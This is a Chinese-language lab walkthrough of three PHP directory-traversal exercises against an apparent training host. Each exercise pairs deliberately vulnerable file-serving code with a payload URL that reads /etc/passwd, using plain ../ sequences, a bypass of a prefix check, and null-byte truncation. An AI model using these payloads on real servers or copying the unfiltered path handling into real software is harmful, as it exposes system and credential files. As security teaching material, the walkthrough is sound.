Example 1
源码:
<?php
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
$path = $UploadDir . $file;
if (!is_file($path))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>
解释:默认以二进制显示头像hack.png, $handle = fopen($path, 'rb');
这里 path 变量没有进行任何过滤,导致可以通过../../../
的形式造成目录穿越
payload:
http://10.10.202.152/dirtrav/example1.php?file=../../../etc/passwd
Example 2
源码:
<?php
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
if (!(strstr($file,"/var/www/files/")))
die();
if (!is_file($file))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($file) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($file));
$handle = fopen($file, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>
解释:这里检测了 file 参数必须含有 /var/www/files/
,实际上并不影响我们使用 ../../
进行目录穿越:
payload:
http://10.10.202.152/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd
Example 3
源码:
<?php
$UploadDir = '/var/www/files/';
if (!(isset($_GET['file'])))
die();
$file = $_GET['file'];
$path = $UploadDir . $file.".png";
// Simulate null-byte issue that used to be in filesystem related functions in PHP
$path = preg_replace('/x00.*/',"",$path);
if (!is_file($path))
die();
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Cache-Control: public');
header('Content-Disposition: inline; filename="' . basename($path) . '";');
header('Content-Transfer-Encoding: binary');
header('Content-Length: ' . filesize($path));
$handle = fopen($path, 'rb');
do {
$data = fread($handle, 8192);
if (strlen($data) == 0) {
break;
}
echo($data);
} while (true);
fclose($handle);
exit();
?>
解释:
$path = $UploadDir . $file.".png"; 限制了读取的文件名为后缀是Png的类型,
但是可以通过 00 截断来 Bypass PHP <= 5.3.4 版本,且魔术引号处于关闭状态的时候可以 00 截断成功。
$path = preg_replace('/x00.*/',"",$path); 正则表达式,x00.* 后面的都替换为空,刚好,%00.png 就可以全部替换掉了。
payload:
http://10.10.202.152/dirtrav/example3.php?file=../../../../../etc/passwd%00
OVER!